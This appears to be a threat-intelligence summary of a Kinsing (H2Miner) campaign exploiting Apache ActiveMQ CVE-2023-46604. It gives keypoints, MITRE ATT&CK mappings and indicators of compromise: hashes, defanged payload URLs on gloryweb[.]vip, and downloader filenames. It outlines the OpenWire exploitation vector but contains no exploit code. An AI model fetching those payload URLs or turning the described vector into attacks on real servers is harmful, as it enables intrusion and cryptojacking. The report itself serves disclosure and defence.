A Kinsing (H2Miner) campaign is actively exploiting CVE-2023-46604 in exposed Apache ActiveMQ servers to deploy downloaders and multiple post-exploitation tools targeting both Linux and Windows, including XMRig, Stager, Sharpire, Cobalt Strike, and Meterpreter. The attacks use manipulated OpenWire serialized payloads to load malicious XML config files that install MSI and executable downloaders from infrastructure such as gloryweb.vip. #Kinsing #CVE-2023-46604 #Sharpire #gloryweb.vip
Keypoints
- Kinsing (H2Miner) is exploiting ActiveMQ CVE-2023-46604 to remotely load attacker-supplied XML configuration files and execute commands on vulnerable servers.
- Attackers installed MSI and mm13.exe downloaders (Stager) that fetch in-memory payloads such as Cobalt Strike and Metasploit Meterpreter.
- Campaign targets both Linux and Windows; Linux deployments include scripts that modify XMRig configs to add the actor’s wallet for cryptomining.
- Sharpire, a .NET backdoor that supports PowerShell Empire, was observed alongside Cobalt Strike, Meterpreter, and XMRig for remote control and post-exploitation.
- Exploitation vector involves manipulating the serialized class type in OpenWire to have the server load a remote class XML configuration file.
- IOC infrastructure includes the domain gloryweb.vip and multiple URLs hosting config, scripts, and MSI payloads; several MD5 hashes of observed files were reported.
- Recommendation: patch or mitigate exposed Apache ActiveMQ instances to prevent remote code execution and subsequent malware deployment.
MITRE Techniques
- [T1210] Exploitation of Remote Services – Exploited CVE-2023-46604 in Apache ActiveMQ by “manipulating the serialized class type that instructs the OpenWire protocol to instantiate a class in the classpath” and sending a crafted packet to load a remote XML config.
- [T1041] Exfiltration Over C2 Channel – Use of Cobalt Strike and Meterpreter for remote control and potential data exfiltration: “…responsible for downloading and executing CobaltStrike or Metasploit’s Meterpreter in the memory.”
- [T1496] Resource Hijacking – Deployment of XMRig and modification of its configuration to include the actor’s wallet to mine cryptocurrency: “adds the Kinsing threat actor’s wallet address to the XMRig configuration file.”
- [T1218] Signed Binary Proxy Execution (Msiexec) – Use of msiexec via attacker-supplied XML to install MSI-based downloader: “responsible for using the msiexec command to install MSI malware from an external source.”
- [T1078] Valid Accounts – Leveraging SSH credentials harvested from infected systems for lateral movement: “they also leverage SSH credentials stored in infected systems during the lateral movement process.”
- [T1059] Command and Scripting Interpreter – Use of Bash and PowerShell scripts for payload delivery and Sharpire supporting PowerShell Empire to execute commands: “Sharpire is a .NET-developed backdoor that supports Powershell Empire” and use of a Bash script to modify XMRig.
Indicators of Compromise
- [MD5 ] observed downloader and payload file hashes – 28fb07cf6dcd072c3d0b82c60ce30bef, 72a37a2fa588e013eafd695b8b5b0e61, and 3 more hashes.
- [URL ] malicious hosting and payload distribution – http://gloryweb[.]vip/mm46[.]msi, http://gloryweb[.]vip/lin/go[.]sh (downloaders and scripts).
- [FQDN ] attacker-controlled domain used for config and payloads – gloryweb[.]vip (serves config.json, scripts, MSI, and ports such as :2086).
- [File Name ] downloader filenames observed on infected hosts – mm13.exe, mm46.msi (downloaders/Stagers used to retrieve Cobalt Strike / Meterpreter payloads).
Read more: https://asec.ahnlab.com/en/90811/